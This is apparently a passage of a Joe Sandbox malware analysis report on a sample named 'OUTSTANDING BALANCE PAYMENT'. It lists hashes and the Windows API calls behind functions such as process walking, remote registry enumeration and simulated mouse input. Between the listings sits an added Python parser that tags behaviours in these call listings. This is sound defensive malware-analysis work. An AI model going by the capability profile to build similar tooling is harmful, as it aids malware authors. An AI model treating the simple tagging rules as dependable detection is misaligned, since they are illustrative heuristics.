                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                  • String ID:
                                                                  • API String ID: 3761583154-0
                                                                  • Opcode ID: 344154a3562d1fb11fb575260108f360bd8fa8c1e3c21aa8044b03febc09a382
                                                                  • Instruction ID: 24192181e12136473bf7a84af78c906d5fcb23ea312f092bf37a9ba5fc55bdb2
                                                                  • Opcode Fuzzy Hash: 344154a3562d1fb11fb575260108f360bd8fa8c1e3c21aa8044b03febc09a382
                                                                  • Instruction Fuzzy Hash: 1D214775611205AFDB109FE9DCC9D6B77ECEF08360B408225FA09CB161DA70EC518B54
                                                                  APIs
                                                                    • Part of subcall function 0029D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0029D1BA
                                                                    • Part of subcall function 0029D17C: GetStockObject.GDI32(00000011), ref: 0029D1CE
                                                                    • Part of subcall function 0029D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0029D1D8
                                                                  • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 002EA32D
                                                                  • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 002EA33A
                                                                  • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 002EA345
                                                                  • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 002EA354
                                                                  • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 002EA360
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$CreateObjectStockWindow
                                                                  • String ID: Msctls_Progress32
                                                                  • API String ID: 1025951953-3636473452
                                                                  • Opcode ID: fbec373a170303ef97cba6449631209c0b4424ed8fec9d2bbce56b5c76d9d2e0
                                                                  • Instruction ID: 81de5f5590e124ae2249c30546b77b4115b8da568f7f4939b72ed65c5b1fe3d8
                                                                  • Opcode Fuzzy Hash: fbec373a170303ef97cba6449631209c0b4424ed8fec9d2bbce56b5c76d9d2e0
                                                                  • Instruction Fuzzy Hash: 5A1190B115021DBEEF115FA1CC85EEB7F6DFF09798F014115FA08A60A0C672AC21DBA4
                                                                  APIs
                                                                  • GetClientRect.USER32(?,?), ref: 0029CCF6
                                                                  • GetWindowRect.USER32(?,?), ref: 0029CD37
                                                                  • ScreenToClient.USER32(?,?), ref: 0029CD5F
                                                                  • GetClientRect.USER32(?,?), ref: 0029CE8C
                                                                  • GetWindowRect.USER32(?,?), ref: 0029CEA5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$Client$Window$Screen
                                                                  • String ID:
                                                                  • API String ID: 1296646539-0
                                                                  • Opcode ID: 8cf969d2be2656c7e9b229ba3e008174bbde56b0ec22512071351c2ec6a01fe5
                                                                  • Instruction ID: db5fbfa201b1d8f072b22f101359949a1a5112747886f25f99c3071a47988bdf
                                                                  • Opcode Fuzzy Hash: 8cf969d2be2656c7e9b229ba3e008174bbde56b0ec22512071351c2ec6a01fe5
                                                                  • Instruction Fuzzy Hash: 25B1627992024ADBDF14CFA8C5807EDB7B1FF08340F249529ED99EB254DB70A960CB64
                                                                  APIs
                                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 002E1C18
                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 002E1C26
                                                                  • __wsplitpath.LIBCMT ref: 002E1C54
                                                                    • Part of subcall function 002A1DFC: __wsplitpath_helper.LIBCMT ref: 002A1E3C
                                                                  • _wcscat.LIBCMT ref: 002E1C69
                                                                  • Process32NextW.KERNEL32(00000000,?), ref: 002E1CDF
                                                                  • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 002E1CF1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                                  • String ID:
                                                                  • API String ID: 1380811348-0
                                                                  • Opcode ID: 3fcdcf5b5fdf6420d6a71cfcbb2bb62b7471536dba4cc8a884d5060313261ae3
                                                                  • Instruction ID: 011bb8b32e73e52e020f7ea008b3bff12122c43b9db92aebbe1ea8c7c296c844
                                                                  • Opcode Fuzzy Hash: 3fcdcf5b5fdf6420d6a71cfcbb2bb62b7471536dba4cc8a884d5060313261ae3
                                                                  • Instruction Fuzzy Hash: 91518D711143419FD720EF24C895EABB7ECEF88754F10492EF58697291EB30D924CBA2
                                                                  APIs
                                                                    • Part of subcall function 002E3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,002E2BB5,?,?), ref: 002E3C1D
                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002E30AF
                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 002E30EF
                                                                  • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 002E3112
                                                                  • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 002E313B
                                                                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 002E317E
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 002E318B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                  • String ID:
                                                                  • API String ID: 3451389628-0
                                                                  • Opcode ID: a0439f1a7984ede32931c39fdbb188849be6d1f0660f8cbdb1cf7fd5989fb941
                                                                  • Instruction ID: 3ebd7b7d83b6769c2a0dcb2981f205fc1578b3949eb04095e186b4de6ade8be4
                                                                  • Opcode Fuzzy Hash: a0439f1a7984ede32931c39fdbb188849be6d1f0660f8cbdb1cf7fd5989fb941
                                                                  • Instruction Fuzzy Hash: 64518931125340AFC700EF64C895E6ABBE9FF88304F04491DF5498B2A1DB71EA29CF52
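The two function listings above (the Toolhelp32 process walk at 002E1C18 and the RegConnectRegistryW / RegEnumValueW loop at 002E30AF) are the kind of "APIs" blocks an analyst usually wants to pull out of a report like this in bulk rather than read one by one. The following Python is an added example, not part of the Joe Sandbox report or of the sample: it parses the bullet-line format used in these blocks into structured call records, orders the direct calls by their ref address, and applies a small set of behaviour rules. The rule table (BEHAVIOR_RULES) and the tag names are assumptions chosen for illustration; the two sample blocks are copied from the report lines above.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Set

# One bullet of a Joe Sandbox "APIs" listing, in the three shapes seen on this page:
#   • CreateToolhelp32Snapshot.KERNEL32 ref: 002E1C18
#   • Process32FirstW.KERNEL32(00000000,?), ref: 002E1C26
#     • Part of subcall function 002A1DFC: __wsplitpath_helper.LIBCMT ref: 002A1E3C
CALL_RE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[#\w:@]+)\.(?P<module>[\w.]+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r"(?:,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+))?\s*$"
)


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: Optional[str]         # call-site address as printed in the report
    subcall_of: Optional[str]  # set when the call is inside a callee, not the listed function


def parse_api_block(text: str) -> List[ApiCall]:
    """Parse the bullet lines of one function's "APIs" section; blank lines are skipped."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        if not line.strip():
            continue
        m = CALL_RE.match(line)
        if m is None:
            raise ValueError(f"unrecognised API line: {line!r}")
        args = m.group("args")
        calls.append(ApiCall(
            name=m.group("name"),
            module=m.group("module").upper(),
            args=[a.strip() for a in args.split(",")] if args else [],
            ref=m.group("ref"),
            subcall_of=m.group("sub"),
        ))
    return calls


# Assumption: illustrative triage rules, not Joe Sandbox's own signatures.
# A tag fires only when every API in its set occurs in the same function.
BEHAVIOR_RULES = {
    "process-enumeration": {"CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW"},
    "registry-value-enumeration": {"RegOpenKeyExW", "RegEnumValueW"},
    "remote-registry-access": {"RegConnectRegistryW"},
    "synthetic-mouse-input": {"mouse_event"},
    "socket-readiness-polling": {"select", "__WSAFDIsSet"},
}


def tag_behaviors(calls: List[ApiCall], include_subcalls: bool = True) -> Set[str]:
    """Return every rule whose required API set is fully present in the block."""
    names = {c.name for c in calls if include_subcalls or c.subcall_of is None}
    return {tag for tag, required in BEHAVIOR_RULES.items() if required <= names}


def call_sequence(calls: List[ApiCall]) -> List[str]:
    """Direct calls only (subcalls dropped), sorted by ref address, as 'MODULE!Name'."""
    direct = [c for c in calls if c.subcall_of is None and c.ref is not None]
    direct.sort(key=lambda c: int(c.ref, 16))
    return [f"{c.module}!{c.name}" for c in direct]


# Sample input: copied from the two "APIs" blocks in the report above.
REPORT_BLOCK_PROCESS = """\
• CreateToolhelp32Snapshot.KERNEL32 ref: 002E1C18
• Process32FirstW.KERNEL32(00000000,?), ref: 002E1C26
• __wsplitpath.LIBCMT ref: 002E1C54
  • Part of subcall function 002A1DFC: __wsplitpath_helper.LIBCMT ref: 002A1E3C
• _wcscat.LIBCMT ref: 002E1C69
• Process32NextW.KERNEL32(00000000,?), ref: 002E1CDF
• CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 002E1CF1
"""

REPORT_BLOCK_REGISTRY = """\
  • Part of subcall function 002E3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,002E2BB5,?,?), ref: 002E3C1D
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002E30AF
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 002E30EF
• RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 002E3112
• RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 002E313B
• RegCloseKey.ADVAPI32(?,?,00000000), ref: 002E317E
• RegCloseKey.ADVAPI32(00000000), ref: 002E318B
"""

if __name__ == "__main__":
    for label, block in (("process walk", REPORT_BLOCK_PROCESS), ("registry loop", REPORT_BLOCK_REGISTRY)):
        calls = parse_api_block(block)
        print(label, "->", " ; ".join(call_sequence(calls)))
        print("   tags:", sorted(tag_behaviors(calls)))
```

The rules deliberately require the whole API set rather than any single name: RegCloseKey or CloseHandle on their own say nothing, and a function that only calls Process32NextW is just as likely to be AutoIt's ProcessList helper as anything hostile. Keep in mind that these listings come from the AutoIt runtime embedded in the sample, so a tag here describes capability available to the script, not behaviour the script necessarily exercised; the dynamic "Signatures" section at the top of the report is the place to confirm that.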
                                                                  APIs
                                                                  • GetMenu.USER32(?), ref: 002E8540
                                                                  • GetMenuItemCount.USER32(00000000), ref: 002E8577
                                                                  • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 002E859F
                                                                  • GetMenuItemID.USER32(?,?), ref: 002E860E
                                                                  • GetSubMenu.USER32(?,?), ref: 002E861C
                                                                  • PostMessageW.USER32(?,00000111,?,00000000), ref: 002E866D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$Item$CountMessagePostString
                                                                  • String ID:
                                                                  • API String ID: 650687236-0
                                                                  • Opcode ID: c853248cc679a74969849121ce7ee78c67b9c9bd9fe448503d9e5f8f2e7ba70b
                                                                  • Instruction ID: 7dfc2cc0b68eaecd66f456130aea38a41fee98d83c132229aee226bf08f6d9f0
                                                                  • Opcode Fuzzy Hash: c853248cc679a74969849121ce7ee78c67b9c9bd9fe448503d9e5f8f2e7ba70b
                                                                  • Instruction Fuzzy Hash: 5351AB35A10215AFCF11EFA5C841AAEB7F8AF08310F51445AE94ABB291CF70AE508F90
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 002C4B10
                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002C4B5B
                                                                  • IsMenu.USER32(00000000), ref: 002C4B7B
                                                                  • CreatePopupMenu.USER32 ref: 002C4BAF
                                                                  • GetMenuItemCount.USER32(000000FF), ref: 002C4C0D
                                                                  • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 002C4C3E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                  • String ID:
                                                                  • API String ID: 3311875123-0
                                                                  • Opcode ID: 70b666348e59e268a5bbb3cb140f36f44a4513b8b0afedc84ac7e0e37381b79f
                                                                  • Instruction ID: 9e4dbff39c776dfe8a75059e0a0a14887fe69a41bcd51c99bb321f9b8098f0bd
                                                                  • Opcode Fuzzy Hash: 70b666348e59e268a5bbb3cb140f36f44a4513b8b0afedc84ac7e0e37381b79f
                                                                  • Instruction Fuzzy Hash: B451C470A1120ADBDF20EF64C894FAEBBF4AF45318F14425EE415972A1D3719E64CB51
                                                                  APIs
                                                                  • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,0031DC00), ref: 002D8E7C
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 002D8E89
                                                                  • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 002D8EAD
                                                                  • #16.WSOCK32(?,?,00000000,00000000), ref: 002D8EC5
                                                                  • _strlen.LIBCMT ref: 002D8EF7
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 002D8F6A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$_strlenselect
                                                                  • String ID:
                                                                  • API String ID: 2217125717-0
                                                                  • Opcode ID: fc3aef699e5ed03f143702bcfa00427c6165888fdb8a2402aa08cf1654936b16
                                                                  • Instruction ID: e5ae2582bdc0aad7df90cfc81abbf188cad79eb7309fe39c7a168a722fa15184
                                                                  • Opcode Fuzzy Hash: fc3aef699e5ed03f143702bcfa00427c6165888fdb8a2402aa08cf1654936b16
                                                                  • Instruction Fuzzy Hash: C941BF75510104AFCB14EFA4CD95EAEB7B9AF08314F20465AF51A972D1DF30AE10CF60
                                                                  APIs
                                                                    • Part of subcall function 0029B34E: GetWindowLongW.USER32(?,000000EB), ref: 0029B35F
                                                                  • BeginPaint.USER32(?,?,?), ref: 0029AC2A
                                                                  • GetWindowRect.USER32(?,?), ref: 0029AC8E
                                                                  • ScreenToClient.USER32(?,?), ref: 0029ACAB
                                                                  • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0029ACBC
                                                                  • EndPaint.USER32(?,?,?,?,?), ref: 0029AD06
                                                                  • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 002FE673
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                                  • String ID:
                                                                  • API String ID: 2592858361-0
                                                                  • Opcode ID: 64ffbf6b4c19d44630f521cccdec595c77b936a8c8cd9cabbb56842a7c156d0c
                                                                  • Instruction ID: 669451b1783fdce7f53f253da0d3c1d65e79a52258cd1522a65aed50398cf111
                                                                  • Opcode Fuzzy Hash: 64ffbf6b4c19d44630f521cccdec595c77b936a8c8cd9cabbb56842a7c156d0c
                                                                  • Instruction Fuzzy Hash: 0841F4701113059FCB12DF14CC84F767BECEF59360F040229FAA48B2A1C735A894CBA2
                                                                  APIs
                                                                  • ShowWindow.USER32(00341628,00000000,00341628,00000000,00000000,00341628,?,002FDC5D,00000000,?,00000000,00000000,00000000,?,002FDAD1,00000004), ref: 002EE40B
                                                                  • EnableWindow.USER32(00000000,00000000), ref: 002EE42F
                                                                  • ShowWindow.USER32(00341628,00000000), ref: 002EE48F
                                                                  • ShowWindow.USER32(00000000,00000004), ref: 002EE4A1
                                                                  • EnableWindow.USER32(00000000,00000001), ref: 002EE4C5
                                                                  • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 002EE4E8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Show$Enable$MessageSend
                                                                  • String ID:
                                                                  • API String ID: 642888154-0
                                                                  • Opcode ID: 7a1bde4fd9d10924f43a5caf3ad8aeac11d59112c328e68fec40afc8decaa0ab
                                                                  • Instruction ID: c6b234c3c351b7b375beeae813916cd84dba6003df05d445438b87259ed53b75
                                                                  • Opcode Fuzzy Hash: 7a1bde4fd9d10924f43a5caf3ad8aeac11d59112c328e68fec40afc8decaa0ab
                                                                  • Instruction Fuzzy Hash: 41418130641582EFDF22CF25D499B947BE1BF09304F9981B9EA588F2E2C731E851CB61
                                                                  APIs
                                                                  • InterlockedExchange.KERNEL32(?,000001F5), ref: 002C98D1
                                                                    • Part of subcall function 0029F4EA: std::exception::exception.LIBCMT ref: 0029F51E
                                                                    • Part of subcall function 0029F4EA: __CxxThrowException@8.LIBCMT ref: 0029F533
                                                                  • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 002C9908
                                                                  • EnterCriticalSection.KERNEL32(?), ref: 002C9924
                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 002C999E
                                                                  • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 002C99B3
                                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 002C99D2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
                                                                  • String ID:
                                                                  • API String ID: 2537439066-0
                                                                  • Opcode ID: fb0998583eac523765a8c280966f11a8488b2fb96552816373fa33f78ca1ffd8
                                                                  • Instruction ID: 310c12524ba828109800162c35ab72c6fd3b2c57364e9ef63ade26ba9664733d
                                                                  • Opcode Fuzzy Hash: fb0998583eac523765a8c280966f11a8488b2fb96552816373fa33f78ca1ffd8
                                                                  • Instruction Fuzzy Hash: AD316E31900205EBDF419FA4DD85E6BB7B8FF44310F1480A9E905AA246D770DA20DBA0
                                                                  APIs
                                                                  • GetForegroundWindow.USER32(?,?,?,?,?,?,002D77F4,?,?,00000000,00000001), ref: 002D9B53
                                                                    • Part of subcall function 002D6544: GetWindowRect.USER32(?,?), ref: 002D6557
                                                                  • GetDesktopWindow.USER32 ref: 002D9B7D
                                                                  • GetWindowRect.USER32(00000000), ref: 002D9B84
                                                                  • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 002D9BB6
                                                                    • Part of subcall function 002C7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 002C7AD0
                                                                  • GetCursorPos.USER32(?), ref: 002D9BE2
                                                                  • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 002D9C44
                                                                  Similarity
                                                                  • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                  • String ID:
                                                                  • API String ID: 4137160315-0
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 002BAFAE
                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 002BAFB5
                                                                  • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 002BAFC4
                                                                  • CloseHandle.KERNEL32(00000004), ref: 002BAFCF
                                                                  • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 002BAFFE
                                                                  • DestroyEnvironmentBlock.USERENV(00000000), ref: 002BB012
                                                                  Similarity
                                                                  • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                  • String ID:
                                                                  • API String ID: 1413079979-0
                                                                  APIs
                                                                    • Part of subcall function 0029AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0029AFE3
                                                                    • Part of subcall function 0029AF83: SelectObject.GDI32(?,00000000), ref: 0029AFF2
                                                                    • Part of subcall function 0029AF83: BeginPath.GDI32(?), ref: 0029B009
                                                                    • Part of subcall function 0029AF83: SelectObject.GDI32(?,00000000), ref: 0029B033
                                                                  • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 002EEC20
                                                                  • LineTo.GDI32(00000000,00000003,?), ref: 002EEC34
                                                                  • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 002EEC42
                                                                  • LineTo.GDI32(00000000,00000000,?), ref: 002EEC52
                                                                  • EndPath.GDI32(00000000), ref: 002EEC62
                                                                  • StrokePath.GDI32(00000000), ref: 002EEC72
                                                                  Similarity
                                                                  • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                  • String ID:
                                                                  • API String ID: 43455801-0
                                                                  APIs
                                                                  • GetDC.USER32(00000000), ref: 002BE1C0
                                                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 002BE1D1
                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 002BE1D8
                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 002BE1E0
                                                                  • MulDiv.KERNEL32(000009EC,?,00000000), ref: 002BE1F7
                                                                  • MulDiv.KERNEL32(000009EC,?,?), ref: 002BE209
                                                                    • Part of subcall function 002B9AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,002B9A05,00000000,00000000,?,002B9DDB), ref: 002BA53A
                                                                  Similarity
                                                                  • API ID: CapsDevice$ExceptionRaiseRelease
                                                                  • String ID:
                                                                  • API String ID: 603618608-0
                                                                  APIs
                                                                  • __init_pointers.LIBCMT ref: 002A7B47
                                                                    • Part of subcall function 002A123A: __initp_misc_winsig.LIBCMT ref: 002A125E
                                                                    • Part of subcall function 002A123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 002A7F51
